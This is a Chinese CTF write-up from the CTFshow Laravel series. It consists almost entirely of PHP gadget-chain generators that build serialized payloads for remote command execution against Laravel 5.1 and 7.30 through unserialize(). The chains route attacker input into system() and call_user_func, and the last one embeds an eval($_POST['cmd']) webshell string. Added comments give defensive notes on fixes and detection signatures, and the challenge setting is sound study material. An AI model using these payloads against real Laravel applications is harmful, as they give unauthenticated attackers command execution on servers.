题目地址:https://ctf.show/challenges
前言:
好久没学习了，继续更新，学无止境。此系列为CTFshow的Laravel专题，主要为Laravel框架的一些漏洞及POC。自9.1新网络安全法更新以来，也不敢提供完整的复现漏洞啥的，只总结一些相关的POC以及自己的学习经历。这里总结的也许并不会那么完整，只能说是笔者自己尽量把所学所找的东西记录下来。
web627
Laravel5.1 反序列化RCE
网上公开的Laravel反序列化链并没有针对5.1版本的，所以得自己挖。
poc:
<?php
namespace{
use Mockery\Generator\DefinedTargetClass;
// Local stand-in for the library class of the same name (global namespace).
// serialize() records only the class name and the private property layout, so the
// real class is never loaded by this generator.
// Defensive note: a chain like this is reachable only where attacker-controlled bytes
// reach unserialize(); the application-side fix is to use json_decode() for untrusted
// data and to keep framework/vendor packages patched.
class Swift_KeyCache_DiskKeyCache{
// Non-empty nested array; its contents are not read anywhere in this script.
private $_keys=['bit'=>array('bit'=>'bit')];
// Holds the next object of the nested chain.
private $_path;
public function __construct($cmd){
// $cmd is passed through unchanged; nothing here validates it.
$this->_path=new DefinedTargetClass($cmd);
}
}
// Entry point: build the object graph from argv[1] and print it URL-encoded
// (presumably for use in a request parameter). The script is a pure generator —
// it never calls unserialize() itself.
echo urlencode(serialize(new Swift_KeyCache_DiskKeyCache($argv[1])));
}
namespace Mockery\Generator{
use Faker\ValidGenerator;
// Stand-in for Mockery\Generator\DefinedTargetClass; only the single private
// property is reproduced so that serialize() yields the expected layout.
class DefinedTargetClass
{
// Carries the next link of the chain (Faker\ValidGenerator).
private $rfc;
public function __construct($cmd)
{
$this->rfc=new ValidGenerator($cmd);
}
}
}
namespace Faker{
// Stand-in for Faker\DefaultGenerator; $default simply holds the raw $cmd string.
class DefaultGenerator{
protected $default;
public function __construct($cmd)
{
$this->default = $cmd;
}
}
// Stand-in for Faker\ValidGenerator. $validator is set to the string 'system'
// (a plain PHP callable name) and $generator wraps the command string; this pairing
// is the sink the author relies on. The call itself happens inside the real Faker
// class on the target, never in this script.
class ValidGenerator
{
protected $generator;
protected $validator;
protected $maxRetries;
public function __construct($cmd){
$this->generator=new DefaultGenerator($cmd);
// Presumably a retry bound read by the real class — confirm against Faker source.
$this->maxRetries=9;
$this->validator='system';
}
}
}
?>
web628
Laravel5.1 反序列化RCE
RCE 姿势2
poc:
<?php
namespace{
use phpDocumentor\Reflection\DocBlock\Tags\Deprecated;
// Same entry stub as in web627; only the object stored in $_path differs
// (a phpDocumentor Deprecated tag instead of a Mockery class).
// Defensive note: serialized strings naming these vendor classes in request,
// cookie or session data are a useful detection signature.
class Swift_KeyCache_DiskKeyCache{
// Non-empty nested array; its contents are not read anywhere in this script.
private $_keys=['bit'=>array('bit'=>'bit')];
// Holds the next object of the nested chain.
private $_path;
public function __construct($cmd){
$this->_path=new Deprecated($cmd);
}
}
// Entry point: serialize the object graph built from argv[1] and print it URL-encoded.
// No validation of argv[1] is performed; the script never calls unserialize() itself.
echo urlencode(serialize(new Swift_KeyCache_DiskKeyCache($argv[1])));
}
namespace phpDocumentor\Reflection\DocBlock\Tags{
use Illuminate\Database\DatabaseManager;
// Minimal parent stub; declares the single protected property the subclass fills.
abstract class BaseTag{
protected $description;
}
// Stand-in for phpDocumentor\Reflection\DocBlock\Tags\Deprecated; $description
// (inherited from BaseTag) holds the next chain object rather than text.
final class Deprecated extends BaseTag{
public function __construct($cmd){
$this->description=new DatabaseManager($cmd);
}
}
}
namespace Illuminate\Database{
// Stand-in for Illuminate\Database\DatabaseManager. $app starts as null, so the nested
// array writes in the constructor auto-vivify it into a plain array of the shape
//   ['config' => ['database.default' => $cmd, 'database.connections' => [$cmd => 'system']]]
// while $extensions maps the same key to 'call_user_func'. Both strings are plain PHP
// callable names; no call is made by this script.
class DatabaseManager{
protected $app;
protected $extensions ;
public function __construct($cmd)
{
// $cmd is used both as the key under 'database.connections' and under $extensions.
$this->app['config']['database.default']=$cmd;
$this->app['config']['database.connections']=array($cmd=>'system');
$this->extensions[$cmd]='call_user_func';
}
}
}
?>
web629-630
Laravel5.1 反序列化RCE
RCE 姿势3-4
poc:
<?php
namespace{
use Prophecy\Argument\Token\ObjectStateToken;
// Same entry stub as in web627/web628; here $_path carries a Prophecy token object.
// Defensive note: the entry class name is identical across all three Laravel 5.1
// variants, so it is the most stable indicator to alert on in serialized input.
class Swift_KeyCache_DiskKeyCache{
// Non-empty nested array; its contents are not read anywhere in this script.
private $_keys=['bit'=>array('bit'=>'bit')];
// Holds the next object of the nested chain.
private $_path;
public function __construct($cmd){
$this->_path=new ObjectStateToken($cmd);
}
}
// Entry point: serialize the object graph built from argv[1] and print it URL-encoded.
// The script is a generator only; it never calls unserialize() itself.
echo urlencode(serialize(new Swift_KeyCache_DiskKeyCache($argv[1])));
}
namespace Prophecy\Argument\Token{
use Mockery\Generator\MockDefinition;
use Illuminate\Validation\Validator;
// Stand-in for Prophecy\Argument\Token\ObjectStateToken. $name is a dummy string;
// $value holds the object that carries the command and $util holds a Validator stub.
class ObjectStateToken{
private $name;
private $value;
private $util;
public function __construct($cmd){
// Placeholder value; not read by this script.
$this->name='bit';
$this->value=new MockDefinition($cmd);
$this->util=new Validator();
}
}
}
namespace Illuminate\Validation{
use Faker\DefaultGenerator;
// Stand-in for Illuminate\Validation\Validator used as the $util link of the chain.
class Validator{
protected $container;
protected $extensions = [];
public function __construct(){
// 'Class@method'-style string (Laravel's callable notation); 'xxx' appears to be a
// placeholder class name — confirm against the framework source.
$this->extensions['y']='xxx@load';
// The container slot is filled with a Faker\DefaultGenerator object.
$this->container=new DefaultGenerator();
}
}
}
namespace Faker{
use Mockery\Loader\EvalLoader;
// Stand-in for Faker\DefaultGenerator; unlike the web627 variant it takes no
// argument and $default holds an EvalLoader stub instead of a string.
class DefaultGenerator
{
protected $default;
public function __construct()
{
$this->default = new EvalLoader();
}
}
}
namespace Mockery\Loader{
// Empty stand-in: only the class name Mockery\Loader\EvalLoader is needed in the output.
class EvalLoader{}
}
namespace Mockery\Generator{
use Illuminate\Session\Store;
// Stand-in for Mockery\Generator\MockDefinition. $code holds the raw command string
// and $config holds an Illuminate\Session\Store stub.
class MockDefinition{
protected $config;
protected $code;
public function __construct($cmd){
$this->config=new Store();
$this->code=$cmd;
}
}
}
namespace Illuminate\Session{
// Stand-in for Illuminate\Session\Store with a single placeholder property.
class Store{
protected $name='bit';// author's note: it is enough that the class does not exist
}
}
?>
web631-634
Laravel7.30 反序列化RCE
RCE 姿势1-4
poc:
<?php
namespace Illuminate\Routing{
use Illuminate\Validation\Validator;
// Stand-in for Illuminate\Routing\PendingResourceRegistration (Laravel 7.30 entry
// object). $name and $controller are set to plain PHP callable names
// ('call_user_func' / 'system'), $options receives the raw command string and
// $registrar holds a Validator stub; no call is made by this script.
// Defensive note: the same rule applies as for the 5.1 chains — the payload only
// matters where untrusted bytes reach unserialize().
class PendingResourceRegistration
{
protected $registrar;
protected $registered = false;
protected $name='call_user_func';
protected $controller='system';
protected $options;
public function __construct($cmd){
$this->registrar=new Validator();
$this->options=$cmd;
}
}
// Entry point: serialize the object graph built from argv[1] and print it URL-encoded.
// argv[1] is not validated; the script never calls unserialize() itself.
echo urlencode(serialize(new PendingResourceRegistration($argv[1])));
}
namespace Illuminate\Validation{
// Stand-in for Illuminate\Validation\Validator. $extensions is declared public here,
// unlike the protected declaration used in the Laravel 5.1 scripts; visibility changes
// the serialized property name, so it is part of the layout being reproduced.
class Validator{
public $extensions = [];
public function __construct(){
// Single extension keyed by the empty string, mapping to a plain callable name.
$this->extensions['']='call_user_func';
}
}
}
?>
web635
Laravel7.30 反序列化RCE
RCE 姿势5
poc:
<?php
namespace Illuminate\Routing{
use Illuminate\View\InvokableComponentVariable;
// Stand-in for Illuminate\Routing\PendingResourceRegistration. This variant takes no
// argument: the only attacker-supplied content is the fixed string inside MockClass,
// and $registrar holds an InvokableComponentVariable stub.
class PendingResourceRegistration
{
protected $registrar;
protected $registered = false;
public function __construct(){
$this->registrar=new InvokableComponentVariable();
}
}
// Entry point: serialize the fixed object graph and print it URL-encoded.
// No command-line input is used by this script.
echo urlencode(serialize(new PendingResourceRegistration()));
}
namespace Illuminate\View{
use PHPUnit\Framework\MockObject\MockClass;
// Stand-in for Illuminate\View\InvokableComponentVariable. $callable is an
// [object, 'generate'] pair — the array form of a PHP callable. The local MockClass
// stub defines no generate() method; only the name has to appear in the output.
class InvokableComponentVariable{
protected $callable;
public function __construct(){
$this->callable=array(new MockClass(),'generate');
}
}
}
namespace PHPUnit\Framework\MockObject{
// Stand-in for PHPUnit\Framework\MockObject\MockClass. All three private properties
// are filled with literal strings; $classCode carries PHP source text as a plain string.
// Defensive note: that literal (an eval() over a POST parameter) is a high-signal
// indicator in serialized request, cookie or session data and in web-server logs.
class MockClass{
private $classCode;
private $mockName;
private $configurableMethods;
public function __construct(){
$this->classCode='eval($_POST["cmd"]);';
// Placeholder values; not read by this script.
$this->mockName='bit';
$this->configurableMethods='bit';
}
}
}